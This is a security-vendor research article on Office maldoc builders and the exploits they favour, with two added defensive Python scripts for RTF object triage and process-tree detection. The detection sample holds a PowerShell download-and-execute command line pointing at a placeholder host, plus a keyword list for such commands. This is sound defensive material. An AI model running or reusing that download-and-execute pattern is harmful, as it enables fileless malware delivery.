By Gabor Szappanos
A new study of weaponized Office documents reveals that, in an unusually sudden and complete shift in criminal priorities, a series of exploits previously used in these malicious documents (in some cases, for years) have been dropped.
Within a few months around the beginning of 2018, the creators of the tools used to mass-produce maldocs wiped the slate clean and now offer only newer exploits for integration. Criminals use these tools, called builders, to fabricate malicious Word, Excel, PowerPoint, PDF or RTF documents that are key elements of targeted attacks, which they then spread primarily through email.
Over the past couple of years, the makers of these builder tools have settled on a relatively cohesive menu of exploits from which criminals can choose, à la carte, the ones they wish to integrate into their maldocs. As detection of older, more established exploits gradually improves in security tools, builder vendors typically phase those exploits out of their offerings. But we have never seen such a drastic abandonment of existing exploits (and, in some cases, of the tools that implement them) in such a short time.
In large part because of the automated nature of these generators, researchers can identify the signature characteristics that individual builder tools leave in maldocs and use them to establish the provenance of a given maldoc.
During the first quarter of this year, we found that only four exploit builders were responsible for generating more than three-quarters of the in-the-wild maldocs we studied. One builder, called Threadkit, which sells for around $800 in Russian online criminal marketplaces, was used to create around a third of the malicious document files we analyzed.
Within a few months of the start of 2018, the most popular exploits, including the Ole2Link vulnerability (CVE-2017-0199), had completely disappeared from maldoc attacks. As it happens, this vulnerability broke the four-year dominance of CVE-2012-0158 (a buffer overflow in the MSCOMCTL.OCX ActiveX control) only last year, and just six months later it joined that old, obsolete bug on the scrap heap of history.
Threadkit, for example, supports a wide range of exploits. In maldocs we attributed to this builder, we saw documents (mostly Rich Text Format, or RTF, files) embedding exploits for at least four separate vulnerabilities in the same file, as shown in the graphic below.
These exploit blocks trigger at least two batch-file installation steps, which in turn run the final executable payload that Threadkit is responsible for delivering. This redundancy may contribute to the infection success rate.
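To make the two preceding observations concrete, here is an added triage script (not part of the original article, and not a Sophos tool) that walks the embedded objects of an RTF file and reports the builder-style traits described above: several embedded objects in one file, objects declaring the Equation Editor class, and objects whose `\objclass` control word disagrees with the class name stored in the object's own OLE1 header, which is one kind of signature characteristic an analyst can use for attribution. The sample RTF is constructed for this example; its `\objdata` blocks are bare OLE1 headers with no exploit content, and the assumed OLE1 layout (version, format id, class-name length, class name) is the standard one.

```python
import re

# Constructed sample RTF for illustration only; it is not a real maldoc. The
# \objdata payloads are just OLE1 headers. Objects 1, 2 and 4 relate to the
# Equation Editor class; object 4 declares Word.Document.8 in \objclass but
# carries "Equation.3" in its OLE1 header.
SAMPLE_RTF = r"""{\rtf1\ansi
{\object\objemb{\*\objclass Equation.3}{\*\objdata 01050000020000000b0000004571756174696f6e2e3300}}
{\object\objemb{\*\objclass Equation.3}{\*\objdata 0105000002000000}}
{\object\objemb{\*\objclass Package}{\*\objdata 0105000002000000}}
{\object\objemb{\*\objclass Word.Document.8}{\*\objdata 01050000020000000b0000004571756174696f6e2e3300}}
}"""

OBJECT_START_RE = re.compile(r'\{\\object\b')
OBJCLASS_RE = re.compile(r'\\\*\\objclass\s+([^}]+)')
OBJDATA_RE = re.compile(r'\\\*\\objdata\s*([0-9a-fA-F\s]+)')


def _group_at(text, start):
    """Return the brace-delimited RTF group that begins at text[start] == '{'."""
    depth = 0
    for i in range(start, len(text)):
        if text[i] == '{':
            depth += 1
        elif text[i] == '}':
            depth -= 1
            if depth == 0:
                return text[start:i + 1]
    return text[start:]  # unbalanced document: take the rest


def parse_ole1_class(data):
    """Read the class name from an OLE1 object header: 4-byte version, 4-byte
    format id (2 = embedded object), 4-byte name length, then the NUL-terminated
    class name. Returns None when the header is absent, foreign or truncated."""
    if len(data) < 12:
        return None
    format_id = int.from_bytes(data[4:8], 'little')
    name_len = int.from_bytes(data[8:12], 'little')
    if format_id != 2 or name_len == 0 or name_len > 256 or len(data) < 12 + name_len:
        return None
    return data[12:12 + name_len].rstrip(b'\x00').decode('ascii', 'replace')


def extract_objects(rtf):
    """List every embedded-object group with its declared class, the class name
    recovered from the OLE1 header, and the decoded size of its hex data."""
    objects = []
    for m in OBJECT_START_RE.finditer(rtf):
        group = _group_at(rtf, m.start())
        cls = OBJCLASS_RE.search(group)
        data = OBJDATA_RE.search(group)
        hexdata = re.sub(r'\s+', '', data.group(1)) if data else ''
        hexdata = hexdata[:len(hexdata) // 2 * 2]  # tolerate a truncated trailing nibble
        raw = bytes.fromhex(hexdata)
        objects.append({
            'declared_class': cls.group(1).strip() if cls else None,
            'ole1_class': parse_ole1_class(raw),
            'data_len': len(raw),
        })
    return objects


def triage(rtf):
    """Summarise the embedded objects and raise the triage flags described above."""
    objs = extract_objects(rtf)
    # Trust the OLE1 header over the \objclass control word when both are present.
    effective = [(o['ole1_class'] or o['declared_class'] or '') for o in objs]
    equation_objects = sum(1 for c in effective if c.lower().startswith('equation'))
    mismatches = sum(
        1 for o in objs
        if o['ole1_class'] and o['declared_class']
        and o['ole1_class'].lower() != o['declared_class'].lower()
    )
    flags = []
    if len(objs) >= 2:
        flags.append('multiple_embedded_objects')
    if equation_objects:
        flags.append('equation_editor_object')
    if mismatches:
        flags.append('objclass_header_mismatch')
    return {
        'object_count': len(objs),
        'equation_objects': equation_objects,
        'class_mismatches': mismatches,
        'classes': sorted(set(effective)),
        'flags': flags,
    }


if __name__ == '__main__':
    for key, value in triage(SAMPLE_RTF).items():
        print(f'{key}: {value}')
```

The brace-matching scan is deliberately simple: it tolerates the obfuscated, unbalanced RTF that builders often emit by taking the remainder of the file when a group never closes, and it reads the class name from the OLE1 header rather than trusting `\objclass`, because the control word is the easier of the two for a builder to spoof.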
Likewise, contemporary maldoc attacks are moving away from embedding malware directly in Office documents. In Q1 2018, the maldoc samples we looked at were all droppers, with the executable payload built into the document itself. But we have watched criminals switch to so-called "fileless" methods that invoke Windows-specific tools such as PowerShell to download and run the malicious payload, making the maldoc smaller and harder to detect.
The exploits that these newer builder vendors seem to prefer include a vulnerability in Microsoft Office's Equation Editor feature (CVE-2017-11882), which, when Microsoft first released details about it in November 2017, the company indicated had not been exploited in the wild.
Since then, we have seen this exploit embedded in at least 56% of the samples we looked at. The vulnerability does not require users to enable macros in the Microsoft Office suite for the code to run. Another Equation Editor vulnerability, CVE-2018-0802, was used in 24% of the maldocs we studied, meaning that one or more of these Equation Editor vulnerabilities was embedded in at least half of the maldocs in our analysis.
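The "fileless" pattern described in this paragraph, and the batch-file installation steps mentioned earlier, both leave a trace that a maldoc itself does not: an Office process spawning a shell or script interpreter. The following added example (not from the article, and not a Sophos detection) runs a simple process-tree rule over constructed process-creation events in the style of Sysmon or EDR telemetry. The parent and child process lists, the command-line markers and the sample events are all assumptions made for this example; eqnedt32.exe is included as a parent because it is the Equation Editor host process.

```python
from pathlib import PureWindowsPath

# Assumed detection lists (not from the article). Office document hosts and the
# Equation Editor process as parents; shell and script interpreters as children.
OFFICE_PARENTS = {'winword.exe', 'excel.exe', 'powerpnt.exe', 'eqnedt32.exe'}
SCRIPT_CHILDREN = {'powershell.exe', 'cmd.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe'}
# Crude substring markers for download-and-execute command lines; tune for your estate.
DOWNLOAD_MARKERS = ('downloadstring', 'downloadfile', 'invoke-webrequest', 'iwr ',
                    'invoke-expression', 'iex', 'frombase64string', ' -enc', ' -e ')

# Constructed process-creation events; not real telemetry. The URL is a placeholder.
SAMPLE_EVENTS = [
    {'parent': r'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE',
     'image': r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe',
     'cmdline': 'powershell.exe -w hidden -c "IEX (New-Object Net.WebClient)'
                '.DownloadString(\'http://example.invalid/stage\')"'},
    {'parent': r'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE',
     'image': r'C:\Windows\System32\cmd.exe',
     'cmdline': r'cmd.exe /c C:\Users\user\AppData\Local\Temp\install.bat'},
    {'parent': r'C:\Windows\explorer.exe',
     'image': r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe',
     'cmdline': r'powershell.exe -File C:\scripts\inventory.ps1'},
    {'parent': r'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE',
     'image': r'C:\Windows\splwow64.exe',
     'cmdline': 'splwow64.exe 12288'},
]


def basename(path):
    """Lower-cased file name of a Windows path, e.g. 'winword.exe'."""
    return PureWindowsPath(path).name.lower()


def classify(event):
    """Score one process-creation event. Returns a severity and the reasons."""
    parent, child = basename(event['parent']), basename(event['image'])
    cmd = event.get('cmdline', '').lower()
    reasons = []
    office_spawn = parent in OFFICE_PARENTS and child in SCRIPT_CHILDREN
    if office_spawn:
        reasons.append(f'{parent} spawned {child}')
    if parent in OFFICE_PARENTS and child == 'cmd.exe' and '.bat' in cmd:
        reasons.append('batch file launched from an Office process')
    markers = [m.strip() for m in DOWNLOAD_MARKERS if m in cmd]
    if child in SCRIPT_CHILDREN and markers:
        reasons.append('download/exec markers: ' + ', '.join(markers))
    if office_spawn and markers:
        severity = 'high'      # Office -> interpreter -> download: the fileless chain
    elif reasons:
        severity = 'medium'    # one suspicious trait on its own
    else:
        severity = 'none'
    return {'severity': severity, 'reasons': reasons}


def scan(events):
    """Return the flagged events, each with its severity and reasons attached."""
    hits = []
    for event in events:
        verdict = classify(event)
        if verdict['severity'] != 'none':
            hits.append(dict(verdict, event=event))
    return hits


if __name__ == '__main__':
    for hit in scan(SAMPLE_EVENTS):
        print(hit['severity'], basename(hit['event']['image']), '|', '; '.join(hit['reasons']))
```

The rule is intentionally lineage-first: an Office process launching an interpreter is rare in most environments regardless of what the command line says, so the parent/child pair drives the alert and the command-line markers only raise its severity. The marker list is deliberately broad and will need exceptions for legitimate automation before it is used in production.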
For example, the NebulaOne builder allows its users to configure and embed this exploit in a Word document.
Microsoft’s updates simply remove the Equation Editor from the system.
The even more recent Flash vulnerability (CVE-2018-4878) has also had an impact, ranking fourth in our chart, which indicates that new vulnerabilities quickly make their way into the builder ecosystem.
We have also observed specific builder tools that appear to be linked to, or to have exclusive distribution agreements with, individual malware campaigns. For example, Threadkit appeared for some time to have an exclusive arrangement to deliver the Trickbot banking malware, although it has also been observed delivering the Lokibot RAT and a wider range of malware families. The EQN_kit1 builder delivered, in roughly equal proportions, the Fareit and Lokibot malware families and, to a lesser extent, the XTRat and Remcos malware.
The good news, at least, is that patches that prevent the majority of these attacks from succeeding have been available for at least six months, and that the exploit prevention technologies in Sophos products and in products from other companies mean the exploits themselves grow less effective with each passing day.
The bad news is that criminals obviously seem to think that the mere availability of patches does not mean people will install them, and they may be right. All of this should be seen as a call to arms for IT administrators or, frankly, anyone who uses the Microsoft Office suite on Windows: update your systems and the software that runs on them without delay, or suffer the consequences when someone mistakenly clicks on the wrong Office document.